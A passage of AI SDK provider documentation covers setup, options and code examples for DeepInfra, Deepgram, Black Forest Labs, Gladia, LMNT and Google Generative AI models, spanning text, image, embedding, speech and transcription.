const { text } = await generateText({
  model: deepinfra('meta-llama/Meta-Llama-3.1-70B-Instruct'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

DeepInfra language models can also be used in the streamText function (see AI SDK Core).

Model Capabilities

Model	Image Input	Object Generation	Tool Usage	Tool Streaming
`meta-llama/Llama-4-Maverick-17B-128E-Instruct-FP8`
`meta-llama/Llama-4-Scout-17B-16E-Instruct`
`meta-llama/Llama-3.3-70B-Instruct-Turbo`
`meta-llama/Llama-3.3-70B-Instruct`
`meta-llama/Meta-Llama-3.1-405B-Instruct`
`meta-llama/Meta-Llama-3.1-70B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-70B-Instruct`
`meta-llama/Meta-Llama-3.1-8B-Instruct-Turbo`
`meta-llama/Meta-Llama-3.1-8B-Instruct`
`meta-llama/Llama-3.2-11B-Vision-Instruct`
`meta-llama/Llama-3.2-90B-Vision-Instruct`
`mistralai/Mixtral-8x7B-Instruct-v0.1`
`deepseek-ai/DeepSeek-V3`
`deepseek-ai/DeepSeek-R1`
`deepseek-ai/DeepSeek-R1-Distill-Llama-70B`
`deepseek-ai/DeepSeek-R1-Turbo`
`nvidia/Llama-3.1-Nemotron-70B-Instruct`
`Qwen/Qwen2-7B-Instruct`
`Qwen/Qwen2.5-72B-Instruct`
`Qwen/Qwen2.5-Coder-32B-Instruct`
`Qwen/QwQ-32B-Preview`
`google/codegemma-7b-it`
`google/gemma-2-9b-it`
`microsoft/WizardLM-2-8x22B`

Image Models

You can create DeepInfra image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
});

Model-specific options

You can pass model-specific parameters using the providerOptions.deepinfra field:

import { deepinfra } from '@ai-sdk/deepinfra';
import { generateImage } from 'ai';

const { image } = await generateImage({
  model: deepinfra.image('stabilityai/sd3.5'),
  prompt: 'A futuristic cityscape at sunset',
  aspectRatio: '16:9',
  providerOptions: {
    deepinfra: {
      num_inference_steps: 30, // Control the number of denoising steps (1-50)
    },
  },
});

Image Editing

DeepInfra supports image editing through models like Qwen/Qwen-Image-Edit. Pass input images via prompt.images to transform or edit existing images.

Basic Image Editing

Transform an existing image using text prompts:

const imageBuffer = readFileSync('./input-image.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'Turn the cat into a golden retriever dog',
    images: [imageBuffer],
  },
  size: '1024x1024',
});

Inpainting with Mask

Edit specific parts of an image using a mask. Transparent areas in the mask indicate where the image should be edited:

const image = readFileSync('./input-image.png');
const mask = readFileSync('./mask.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'A sunlit indoor lounge area with a pool containing a flamingo',
    images: [image],
    mask: mask,
  },
});

Multi-Image Combining

Combine multiple reference images into a single output:

const cat = readFileSync('./cat.png');
const dog = readFileSync('./dog.png');

const { images } = await generateImage({
  model: deepinfra.image('Qwen/Qwen-Image-Edit'),
  prompt: {
    text: 'Create a scene with both animals together, playing as friends',
    images: [cat, dog],
  },
});

Model Capabilities

For models supporting aspect ratios, the following ratios are typically supported: 1:1 (default), 16:9, 1:9, 3:2, 2:3, 4:5, 5:4, 9:16, 9:21

For models supporting size parameters, dimensions must typically be:

Multiples of 32
Width and height between 256 and 1440 pixels
Default size is 1024x1024

Model	Dimensions Specification	Notes
`stabilityai/sd3.5`	Aspect Ratio	Premium quality base model, 8B parameters
`black-forest-labs/FLUX-1.1-pro`	Size	Latest state-of-art model with superior prompt following
`black-forest-labs/FLUX-1-schnell`	Size	Fast generation in 1-4 steps
`black-forest-labs/FLUX-1-dev`	Size	Optimized for anatomical accuracy
`black-forest-labs/FLUX-pro`	Size	Flagship Flux model
`black-forest-labs/FLUX.1-Kontext-dev`	Size	Image editing and transformation model
`black-forest-labs/FLUX.1-Kontext-pro`	Size	Professional image editing and transformation
`stabilityai/sd3.5-medium`	Aspect Ratio	Balanced 2.5B parameter model
`stabilityai/sdxl-turbo`	Aspect Ratio	Optimized for fast generation

For more details and pricing information, see the DeepInfra text-to-image models page.

Embedding Models

You can create DeepInfra embedding models using the .embeddingModel() factory method. For more on embedding models with the AI SDK see embed().

import { deepinfra } from '@ai-sdk/deepinfra';
import { embed } from 'ai';

const { embedding } = await embed({
  model: deepinfra.embeddingModel('BAAI/bge-large-en-v1.5'),
  value: 'sunny day at the beach',
});

Model Capabilities

Model	Dimensions	Max Tokens
`BAAI/bge-base-en-v1.5`	768	512
`BAAI/bge-large-en-v1.5`	1024	512
`BAAI/bge-m3`	1024	8192
`intfloat/e5-base-v2`	768	512
`intfloat/e5-large-v2`	1024	512
`intfloat/multilingual-e5-large`	1024	512
`sentence-transformers/all-MiniLM-L12-v2`	384	256
`sentence-transformers/all-MiniLM-L6-v2`	384	256
`sentence-transformers/all-mpnet-base-v2`	768	384
`sentence-transformers/clip-ViT-B-32`	512	77
`sentence-transformers/clip-ViT-B-32-multilingual-v1`	512	77
`sentence-transformers/multi-qa-mpnet-base-dot-v1`	768	512
`sentence-transformers/paraphrase-MiniLM-L6-v2`	384	128
`shibing624/text2vec-base-chinese`	768	512
`thenlper/gte-base`	768	512
`thenlper/gte-large`	1024	512

title: Deepgram description: Learn how to use the Deepgram provider for the AI SDK.

Deepgram Provider

The Deepgram provider contains language model support for the Deepgram transcription and speech generation APIs.

Setup

The Deepgram provider is available in the @ai-sdk/deepgram module. You can install it with

Provider Instance

You can import the default provider instance deepgram from @ai-sdk/deepgram:

import { deepgram } from '@ai-sdk/deepgram';

If you need a customized setup, you can import createDeepgram from @ai-sdk/deepgram and create a provider instance with your settings:

import { createDeepgram } from '@ai-sdk/deepgram';

const deepgram = createDeepgram({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Deepgram provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the DEEPGRAM_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the Deepgram text-to-speech API using the .speech() factory method.

The first argument is the model id, which includes the voice. Deepgram embeds the voice directly in the model ID (e.g., aura-2-helena-en).

const model = deepgram.speech('aura-2-helena-en');

You can use the model with the generateSpeech function:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram } from '@ai-sdk/deepgram';

const result = await generateSpeech({
  model: deepgram.speech('aura-2-helena-en'),
  text: 'Hello, world!',
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { deepgram, type DeepgramSpeechModelOptions } from '@ai-sdk/deepgram';

const result = await generateSpeech({
  model: deepgram.speech('aura-2-helena-en'),
  text: 'Hello, world!',
  providerOptions: {
    deepgram: {
      encoding: 'linear16',
      sampleRate: 24000,
    } satisfies DeepgramSpeechModelOptions,
  },
});

The following provider options are available:

encoding string

Encoding type for the audio output. Supported values: 'linear16', 'mulaw', 'alaw', 'mp3', 'opus', 'flac', 'aac'. Optional.
container string

Container format for the output audio. Supported values: 'wav', 'ogg', 'none'. Optional.
sampleRate number

Sample rate for the output audio in Hz. Supported values depend on the encoding: 8000, 16000, 24000, 32000, 48000. Optional.
bitRate number | string

Bitrate of the audio in bits per second. For mp3: 32000 or 48000. For opus: 4000 to 650000. For aac: 4000 to 192000. Optional.
callback string

URL to which Deepgram will make a callback request with the audio. Optional.
callbackMethod enum

HTTP method for the callback request. Allowed values: 'POST', 'PUT'. Optional.
mipOptOut boolean

Opts out requests from the Deepgram Model Improvement Program. Optional.
tag string | array of strings

Label your requests for identification during usage reporting. Optional.

Model Capabilities

Model
`aura-2-asteria-en`
`aura-2-thalia-en`
`aura-2-helena-en`
`aura-2-orpheus-en`
`aura-2-zeus-en`
`aura-asteria-en`
`aura-luna-en`
`aura-stella-en`
+ more voices

Transcription Models

You can create models that call the Deepgram transcription API using the .transcription() factory method.

The first argument is the model id e.g. nova-3.

const model = deepgram.transcription('nova-3');

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import {
  deepgram,
  type DeepgramTranscriptionModelOptions,
} from '@ai-sdk/deepgram';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: deepgram.transcription('nova-3'),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    deepgram: {
      summarize: true,
    } satisfies DeepgramTranscriptionModelOptions,
  },
});

The following provider options are available:

language string

Language code for the audio. Supports numerous ISO-639-1 and ISO-639-3 language codes. Optional.
detectLanguage boolean

Whether to enable automatic language detection. When true, Deepgram will detect the language of the audio. Optional.
smartFormat boolean

Whether to apply smart formatting to the transcription. Optional.
punctuate boolean

Whether to add punctuation to the transcription. Optional.
summarize enum | boolean

Whether to generate a summary of the transcription. Allowed values: 'v2', false. Optional.
topics boolean

Whether to detect topics in the transcription. Optional.
detectEntities boolean

Whether to detect entities in the transcription. Optional.
redact string | array of strings

Specifies what content to redact from the transcription. Optional.
search string

Search term to find in the transcription. Optional.
diarize boolean

Whether to identify different speakers in the transcription. Defaults to true. Optional.
utterances boolean

Whether to segment the transcription into utterances. Optional.
uttSplit number

Threshold for splitting utterances. Optional.
fillerWords boolean

Whether to include filler words (um, uh, etc.) in the transcription. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`nova-3` (+ variants)
`nova-2` (+ variants)
`nova` (+ variants)
`enhanced` (+ variants)
`base` (+ variants)

title: Black Forest Labs description: Learn how to use Black Forest Labs models with the AI SDK.

Black Forest Labs Provider

Setup

The Black Forest Labs provider is available via the @ai-sdk/black-forest-labs module. You can install it with

Provider Instance

You can import the default provider instance blackForestLabs from @ai-sdk/black-forest-labs:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';

If you need a customized setup, you can import createBlackForestLabs and create a provider instance with your settings:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  apiKey: 'your-api-key', // optional, defaults to BFL_API_KEY environment variable
  baseURL: 'custom-url', // optional
  headers: {
    /* custom headers */
  }, // optional
});

You can use the following optional settings to customize the Black Forest Labs provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use a regional endpoint. The default prefix is https://api.bfl.ai/v1.
apiKey string

API key that is being sent using the x-key header. It defaults to the BFL_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
pollIntervalMillis number

Interval in milliseconds between polling attempts when waiting for image generation to complete. Defaults to 500ms.
pollTimeoutMillis number

Overall timeout in milliseconds for polling before giving up. Defaults to 60000ms (60 seconds).

Image Models

You can create Black Forest Labs image models using the .image() factory method. For more on image generation with the AI SDK see generateImage().

Basic Usage

import { writeFileSync } from 'node:fs';
import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
});

const filename = `image-${Date.now()}.png`;
writeFileSync(filename, image.uint8Array);
console.log(`Image saved to ${filename}`);

Model Capabilities

Black Forest Labs offers many models optimized for different use cases. Here are a few popular examples. For a full list of models, see the Black Forest Labs Models Page.

Model	Description
`flux-kontext-pro`	FLUX.1 Kontext [pro] handles both text and reference images as inputs, enabling targeted edits and complex transformations
`flux-kontext-max`	FLUX.1 Kontext [max] with improved prompt adherence and typography generation
`flux-pro-1.1-ultra`	Ultra-fast, ultra high-resolution image creation
`flux-pro-1.1`	Fast, high-quality image generation from text.
`flux-pro-1.0-fill`	Inpainting model for filling masked regions of images with new content

Black Forest Labs models support aspect ratios from 3:7 (portrait) to 7:3 (landscape).

Image Editing

Black Forest Labs Kontext models support powerful image editing capabilities using reference images. Pass input images via prompt.images to transform, combine, or edit existing images.

Single Image Editing

Transform an existing image using text prompts:

import {
  blackForestLabs,
  BlackForestLabsImageModelOptions,
} from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-kontext-pro'),
  prompt: {
    text: 'A baby elephant with a shirt that has the logo from the input image.',
    images: [
      'https://www.google.com/images/branding/googlelogo/1x/googlelogo_color_272x92dp.png',
    ],
  },
  providerOptions: {
    blackForestLabs: {
      width: 1024,
      height: 768,
    } satisfies BlackForestLabsImageModelOptions,
  },
});

Multi-Reference Editing

Combine multiple reference images for complex transformations. Black Forest Labs supports up to 10 input images:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-kontext-pro'),
  prompt: {
    text: 'Combine the style of image 1 with the subject of image 2',
    images: [
      'https://example.com/style-reference.jpg',
      'https://example.com/subject-reference.jpg',
    ],
  },
});

Inpainting

The flux-pro-1.0-fill model supports inpainting, which allows you to fill masked regions of an image with new content. Pass the source image via prompt.images and a mask image via prompt.mask:

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { images } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.0-fill'),
  prompt: {
    text: 'A beautiful garden with flowers',
    images: ['https://example.com/source-image.jpg'],
    mask: 'https://example.com/mask-image.png',
  },
});

The mask image should be a grayscale image where white areas indicate regions to be filled and black areas indicate regions to preserve.

Provider Options

Black Forest Labs image models support flexible provider options through the providerOptions.blackForestLabs object. The supported parameters depend on the used model ID:

width number - Output width in pixels (256–1920). When set, this overrides any width derived from size.
height number - Output height in pixels (256–1920). When set, this overrides any height derived from size.
outputFormat string - Desired format of the output image ("jpeg" or "png").
steps number - Number of inference steps. Higher values may improve quality but increase generation time.
guidance number - Guidance scale for generation. Higher values follow the prompt more closely.
imagePrompt string - Base64-encoded image to use as additional visual context for generation.
imagePromptStrength number - Strength of the image prompt influence on generation (0.0 to 1.0).
promptUpsampling boolean - If true, performs upsampling on the prompt.
raw boolean - Enable raw mode for more natural, authentic aesthetics.
safetyTolerance number - Moderation level for inputs and outputs (0 = most strict, 6 = more permissive).
pollIntervalMillis number - Interval in milliseconds between polling attempts (default 500ms).
pollTimeoutMillis number - Overall timeout in milliseconds for polling before timing out (default 60s).
webhookUrl string - URL for asynchronous completion notification. Must be a valid HTTP/HTTPS URL.
webhookSecret string - Secret for webhook signature verification, sent in the X-Webhook-Secret header.

Provider Metadata

The generateImage response includes provider-specific metadata in providerMetadata.blackForestLabs.images[]. Each image object may contain the following properties:

seed number - The seed used for generation. Useful for reproducing results.
start_time number - Unix timestamp when generation started.
end_time number - Unix timestamp when generation completed.
duration number - Generation duration in seconds.
cost number - Cost of the generation request.
inputMegapixels number - Input image size in megapixels.
outputMegapixels number - Output image size in megapixels.

import { blackForestLabs } from '@ai-sdk/black-forest-labs';
import { generateImage } from 'ai';

const { image, providerMetadata } = await generateImage({
  model: blackForestLabs.image('flux-pro-1.1'),
  prompt: 'A serene mountain landscape at sunset',
});

// Access provider metadata
const metadata = providerMetadata?.blackForestLabs?.images?.[0];
console.log('Seed:', metadata?.seed);
console.log('Cost:', metadata?.cost);
console.log('Duration:', metadata?.duration);

Regional Endpoints

By default, requests are sent to https://api.bfl.ai/v1. You can select a regional endpoint by setting baseURL when creating the provider instance:

import { createBlackForestLabs } from '@ai-sdk/black-forest-labs';

const blackForestLabs = createBlackForestLabs({
  baseURL: 'https://api.eu.bfl.ai/v1', // or https://api.us.bfl.ai/v1
});

title: Gladia description: Learn how to use the Gladia provider for the AI SDK.

Gladia Provider

The Gladia provider contains language model support for the Gladia transcription API.

Setup

The Gladia provider is available in the @ai-sdk/gladia module. You can install it with

Provider Instance

You can import the default provider instance gladia from @ai-sdk/gladia:

import { gladia } from '@ai-sdk/gladia';

If you need a customized setup, you can import createGladia from @ai-sdk/gladia and create a provider instance with your settings:

import { createGladia } from '@ai-sdk/gladia';

const gladia = createGladia({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the Gladia provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the GLADIA_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Transcription Models

You can create models that call the Gladia transcription API using the .transcription() factory method.

const model = gladia.transcription();

You can also pass additional provider-specific options using the providerOptions argument. For example, supplying the summarize option will enable summaries for sections of content.

import { experimental_transcribe as transcribe } from 'ai';
import { gladia } from '@ai-sdk/gladia';
import { type GladiaTranscriptionModelOptions } from '@ai-sdk/gladia';
import { readFile } from 'fs/promises';

const result = await transcribe({
  model: gladia.transcription(),
  audio: await readFile('audio.mp3'),
  providerOptions: {
    gladia: {
      summarization: true,
    } satisfies GladiaTranscriptionModelOptions,
  },
});

The following provider options are available:

contextPrompt string

Context to feed the transcription model with for possible better accuracy. Optional.
customVocabulary boolean | any[]

Custom vocabulary to improve transcription accuracy. Optional.
customVocabularyConfig object

Configuration for custom vocabulary. Optional.
- vocabulary Array<string | { value: string, intensity?: number, pronunciations?: string[], language?: string }>
- defaultIntensity number
detectLanguage boolean

Whether to automatically detect the language. Optional.
enableCodeSwitching boolean

Enable code switching for multilingual audio. Optional.
codeSwitchingConfig object

Configuration for code switching. Optional.
- languages string[]
language string

Specify the language of the audio. Optional.
callback boolean

Enable callback when transcription is complete. Optional.
callbackConfig object

Configuration for callback. Optional.
- url string
- method 'POST' | 'PUT'
subtitles boolean

Generate subtitles from the transcription. Optional.
subtitlesConfig object

Configuration for subtitles. Optional.
- formats Array<'srt' | 'vtt'>
- minimumDuration number
- maximumDuration number
- maximumCharactersPerRow number
- maximumRowsPerCaption number
- style 'default' | 'compliance'
diarization boolean

Enable speaker diarization. Optional.
diarizationConfig object

Configuration for diarization. Optional.
- numberOfSpeakers number
- minSpeakers number
- maxSpeakers number
- enhanced boolean
translation boolean

Enable translation of the transcription. Optional.
translationConfig object

Configuration for translation. Optional.
- targetLanguages string[]
- model 'base' | 'enhanced'
- matchOriginalUtterances boolean
summarization boolean

Enable summarization of the transcription. Optional.
summarizationConfig object

Configuration for summarization. Optional.
- type 'general' | 'bullet_points' | 'concise'
moderation boolean

Enable content moderation. Optional.
namedEntityRecognition boolean

Enable named entity recognition. Optional.
chapterization boolean

Enable chapterization of the transcription. Optional.
nameConsistency boolean

Enable name consistency in the transcription. Optional.
customSpelling boolean

Enable custom spelling. Optional.
customSpellingConfig object

Configuration for custom spelling. Optional.
- spellingDictionary Record<string, string[]>
structuredDataExtraction boolean

Enable structured data extraction. Optional.
structuredDataExtractionConfig object

Configuration for structured data extraction. Optional.
- classes string[]
sentimentAnalysis boolean

Enable sentiment analysis. Optional.
audioToLlm boolean

Enable audio to LLM processing. Optional.
audioToLlmConfig object

Configuration for audio to LLM. Optional.
- prompts string[]
customMetadata Record<string, any>

Custom metadata to include with the request. Optional.
sentences boolean

Enable sentence detection. Optional.
displayMode boolean

Enable display mode. Optional.
punctuationEnhanced boolean

Enable enhanced punctuation. Optional.

Model Capabilities

Model	Transcription	Duration	Segments	Language
`Default`

title: LMNT description: Learn how to use the LMNT provider for the AI SDK.

LMNT Provider

The LMNT provider contains speech model support for the LMNT speech synthesis API.

Setup

The LMNT provider is available in the @ai-sdk/lmnt module. You can install it with

Provider Instance

You can import the default provider instance lmnt from @ai-sdk/lmnt:

import { lmnt } from '@ai-sdk/lmnt';

If you need a customized setup, you can import createLMNT from @ai-sdk/lmnt and create a provider instance with your settings:

import { createLMNT } from '@ai-sdk/lmnt';

const lmnt = createLMNT({
  // custom settings, e.g.
  fetch: customFetch,
});

You can use the following optional settings to customize the LMNT provider instance:

apiKey string

API key that is being sent using the Authorization header. It defaults to the LMNT_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.

Speech Models

You can create models that call the LMNT speech API using the .speech() factory method.

The first argument is the model id e.g. aurora.

const model = lmnt.speech('aurora');

The voice parameter can be set to a voice ID from LMNT. You can find available voices in the LMNT documentation.

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  voice: 'ava',
  language: 'en',
});

You can also pass additional provider-specific options using the providerOptions argument:

import { experimental_generateSpeech as generateSpeech } from 'ai';
import { lmnt } from '@ai-sdk/lmnt';
import { type LMNTSpeechModelOptions } from '@ai-sdk/lmnt';

const result = await generateSpeech({
  model: lmnt.speech('aurora'),
  text: 'Hello, world!',
  voice: 'ava',
  language: 'en',
  providerOptions: {
    lmnt: {
      conversational: true,
      speed: 1.2,
    } satisfies LMNTSpeechModelOptions,
  },
});

Provider Options

The LMNT provider accepts the following options via providerOptions.lmnt:

format 'aac' | 'mp3' | 'mulaw' | 'raw' | 'wav'

The audio format to return. Defaults to 'mp3'.
sampleRate 8000 | 16000 | 24000

The sample rate of the audio in Hz. Defaults to 24000.
speed number

The speed of the speech. Must be between 0.25 and 2. Defaults to 1.
seed number

An optional seed for deterministic generation.
conversational boolean

Whether to use a conversational style. Defaults to false. Does not work with the blizzard model.
length number

Maximum length of the audio in seconds. Maximum value is 300. Does not work with the blizzard model.
topP number

Top-p sampling parameter. Must be between 0 and 1. Defaults to 1.
temperature number

Temperature parameter for sampling. Must be at least 0. Defaults to 1.

Model Capabilities

Model	Instructions
`aurora`
`blizzard`

title: Google Generative AI description: Learn how to use Google Generative AI Provider.

Google Generative AI Provider

The Google Generative AI provider contains language and embedding model support for the Google Generative AI APIs.

Setup

The Google provider is available in the @ai-sdk/google module. You can install it with

Provider Instance

You can import the default provider instance google from @ai-sdk/google:

import { google } from '@ai-sdk/google';

If you need a customized setup, you can import createGoogleGenerativeAI from @ai-sdk/google and create a provider instance with your settings:

import { createGoogleGenerativeAI } from '@ai-sdk/google';

const google = createGoogleGenerativeAI({
  // custom settings
});

You can use the following optional settings to customize the Google Generative AI provider instance:

baseURL string

Use a different URL prefix for API calls, e.g. to use proxy servers. The default prefix is https://generativelanguage.googleapis.com/v1beta.
apiKey string

API key that is being sent using the x-goog-api-key header. It defaults to the GOOGLE_GENERATIVE_AI_API_KEY environment variable.
headers Record<string,string>

Custom headers to include in the requests.
fetch (input: RequestInfo, init?: RequestInit) => Promise<Response>

Custom fetch implementation. Defaults to the global fetch function. You can use it as a middleware to intercept requests, or to provide a custom fetch implementation for e.g. testing.
generateId () => string

Optional function to generate unique IDs for each request. Defaults to the SDK's built-in ID generator.
name string

Custom provider name. Defaults to 'google.generative-ai'.

Language Models

const model = google('gemini-2.5-flash');

You can use Google Generative AI language models to generate text with the generateText function:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const { text } = await generateText({
  model: google('gemini-2.5-flash'),
  prompt: 'Write a vegetarian lasagna recipe for 4 people.',
});

Google Generative AI language models can also be used in the streamText function and support structured data generation with Output (see AI SDK Core).

Google Generative AI also supports some model specific settings that are not part of the standard call settings. You can pass them as an options argument:

import { google, type GoogleLanguageModelOptions } from '@ai-sdk/google';

const model = google('gemini-2.5-flash');

await generateText({
  model,
  providerOptions: {
    google: {
      safetySettings: [
        {
          category: 'HARM_CATEGORY_UNSPECIFIED',
          threshold: 'BLOCK_LOW_AND_ABOVE',
        },
      ],
    } satisfies GoogleLanguageModelOptions,
  },
});

The following optional provider options are available for Google Generative AI models:

cachedContent string

Optional. The name of the cached content used as context to serve the prediction. Format: cachedContents/{cachedContent}
structuredOutputs boolean

Optional. Enable structured output. Default is true.

This is useful when the JSON Schema contains elements that are not supported by the OpenAPI schema version that Google Generative AI uses. You can use this to disable structured outputs if you need to.

See Troubleshooting: Schema Limitations for more details.
safetySettings Array<{ category: string; threshold: string }>

Optional. Safety settings for the model.
- category string
  
  The category of the safety setting. Can be one of the following:
  - HARM_CATEGORY_UNSPECIFIED
  - HARM_CATEGORY_HATE_SPEECH
  - HARM_CATEGORY_DANGEROUS_CONTENT
  - HARM_CATEGORY_HARASSMENT
  - HARM_CATEGORY_SEXUALLY_EXPLICIT
  - HARM_CATEGORY_CIVIC_INTEGRITY
- threshold string
  
  The threshold of the safety setting. Can be one of the following:
  - HARM_BLOCK_THRESHOLD_UNSPECIFIED
  - BLOCK_LOW_AND_ABOVE
  - BLOCK_MEDIUM_AND_ABOVE
  - BLOCK_ONLY_HIGH
  - BLOCK_NONE
  - OFF
responseModalities string[] The modalities to use for the response. The following modalities are supported: TEXT, IMAGE. When not defined or empty, the model defaults to returning only text.
thinkingConfig { thinkingLevel?: 'minimal' | 'low' | 'medium' | 'high'; thinkingBudget?: number; includeThoughts?: boolean }

Optional. Configuration for the model's thinking process. Only supported by specific Google Generative AI models.
- thinkingLevel 'minimal' | 'low' | 'medium' | 'high'
  
  Optional. Controls the thinking depth for Gemini 3 models. Gemini 3.1 Pro supports 'low', 'medium', and 'high', Gemini 3 Pro supports 'low' and 'high', while Gemini 3 Flash supports all four levels: 'minimal', 'low', 'medium', and 'high'. Only supported by Gemini 3 models.
- thinkingBudget number
  
  Optional. Gives the model guidance on the number of thinking tokens it can use when generating a response. Setting it to 0 disables thinking, if the model supports it. For more information about the possible value ranges for each model see Google Generative AI thinking documentation.
- includeThoughts boolean
  
  Optional. If set to true, thought summaries are returned, which are synthesized versions of the model's raw thoughts and offer insights into the model's internal reasoning process.
imageConfig { aspectRatio?: string, imageSize?: string }

Optional. Configuration for the models image generation. Only supported by specific Google Generative AI models.
- aspectRatio string
  
  Model defaults to generate 1:1 squares, or to matching the output image size to that of your input image. Can be one of the following:
  - 1:1
  - 2:3
  - 3:2
  - 3:4
  - 4:3
  - 4:5
  - 5:4
  - 9:16
  - 16:9
  - 21:9
- imageSize string
  
  Controls the output image resolution. Defaults to 1K. Can be one of the following:
  - 1K
  - 2K
  - 4K
audioTimestamp boolean

Optional. Enables timestamp understanding for audio-only files. See Google Cloud audio understanding documentation.
mediaResolution string

Optional. If specified, the media resolution specified will be used. Can be one of the following:
- MEDIA_RESOLUTION_UNSPECIFIED
- MEDIA_RESOLUTION_LOW
- MEDIA_RESOLUTION_MEDIUM
- MEDIA_RESOLUTION_HIGH
See Google API MediaResolution documentation.
labels Record<string, string>

Optional. Defines labels used in billing reports. Available on Vertex AI only. See Google Cloud labels documentation.
serviceTier 'standard' | 'flex' | 'priority'

Optional. The service tier to use for the request. Set to 'flex' for 50% cheaper processing at the cost of increased latency. Set to 'priority' for ultra-low latency at a 75-100% price premium over 'standard'.
threshold string

Optional. Standalone threshold setting that can be used independently of safetySettings. Uses the same values as the safetySettings threshold.

Thinking

Gemini 3 Models

For Gemini 3 models, use the thinkingLevel parameter to control the depth of reasoning:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-3.1-pro-preview');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingLevel: 'high',
        includeThoughts: true,
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

Gemini 2.5 Models

For Gemini 2.5 models, use the thinkingBudget parameter to control the number of thinking tokens:

import { google, GoogleLanguageModelOptions } from '@ai-sdk/google';
import { generateText } from 'ai';

const model = google('gemini-2.5-flash');

const { text, reasoning } = await generateText({
  model: model,
  prompt: 'What is the sum of the first 10 prime numbers?',
  providerOptions: {
    google: {
      thinkingConfig: {
        thinkingBudget: 8192,
        includeThoughts: true,
      },
    } satisfies GoogleLanguageModelOptions,
  },
});

console.log(text);

console.log(reasoning); // Reasoning summary

File Inputs

The Google Generative AI provider supports file inputs, e.g. PDF files.

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'What is an embedding model according to this document?',
        },
        {
          type: 'file',
          data: fs.readFileSync('./data/ai.pdf'),
          mediaType: 'application/pdf',
        },
      ],
    },
  ],
});

You can also use YouTube URLs directly:

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

const result = await generateText({
  model: google('gemini-2.5-flash'),
  messages: [
    {
      role: 'user',
      content: [
        {
          type: 'text',
          text: 'Summarize this video',
        },
        {
          type: 'file',
          data: 'https://www.youtube.com/watch?v=dQw4w9WgXcQ',
          mediaType: 'video/mp4',
        },
      ],
    },
  ],
});

See File Parts for details on how to use files in prompts.

Cached Content

Google Generative AI supports both explicit and implicit caching to help reduce costs on repetitive content.

Implicit Caching

To maximize cache hits with implicit caching:

Keep content at the beginning of requests consistent
Add variable content (like user questions) at the end of prompts
Ensure requests meet minimum token requirements:
- Gemini 2.5 Flash: 1024 tokens minimum
- Gemini 2.5 Pro: 2048 tokens minimum

import { google } from '@ai-sdk/google';
import { generateText } from 'ai';

// Structure prompts with consistent content at the beginning
const baseContext =
  'You are a cooking assistant with expertise in Italian cuisine. Here are 1000 lasagna recipes for reference...';

const { text: veggieLasagna } = await generateText({
  model: google('gemini-2.5-pro'),
  prompt: `${baseContext}\n\nWrite a vegetarian lasagna recipe for 4 people.`,
});

